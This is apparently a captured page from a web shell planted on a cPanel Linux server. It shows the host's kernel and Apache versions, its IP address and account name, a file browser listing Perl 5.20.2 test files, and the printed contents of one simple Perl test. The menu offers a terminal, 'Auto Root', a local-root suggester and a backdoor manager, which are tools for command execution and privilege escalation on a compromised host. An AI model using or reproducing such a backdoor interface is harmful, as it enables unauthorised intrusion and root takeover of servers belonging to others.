Linux cpanel2.daytoncreative.net 2.6.32-754.29.2.el6.x86_64 #1 SMP Tue May 12 17:39:04 UTC 2020 x86_64
Apache/2.4.43 (cPanel) OpenSSL/1.1.1g mod_bwlimited/1.4
Server IP : 70.62.220.67 & Your IP : 216.73.216.193
Domains :
Cant Read [ /etc/named.conf ]
User : michaelgreg
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
log /
perl-5.20.2 /
t /
base /
Delete
Unzip
Name
Size
Permission
Date
Action
cond.t
335
B
-r--r--r--
2014-12-27 11:49
if.t
210
B
-r--r--r--
2014-12-27 11:49
lex.t
9.85
KB
-r--r--r--
2014-12-27 11:49
num.t
6.05
KB
-r--r--r--
2014-12-27 11:49
pat.t
207
B
-r--r--r--
2014-12-27 11:49
rs.t
8.5
KB
-r--r--r--
2014-12-27 11:49
term.t
1.12
KB
-r--r--r--
2014-12-27 11:49
while.t
471
B
-r--r--r--
2014-12-27 11:49
Save
Rename
#!./perl print "1..2\n"; # first test to see if we can run the tests. $x = 'test'; if ($x eq $x) { print "ok 1\n"; } else { print "not ok 1\n";} if ($x ne $x) { print "not ok 2\n"; } else { print "ok 2\n";}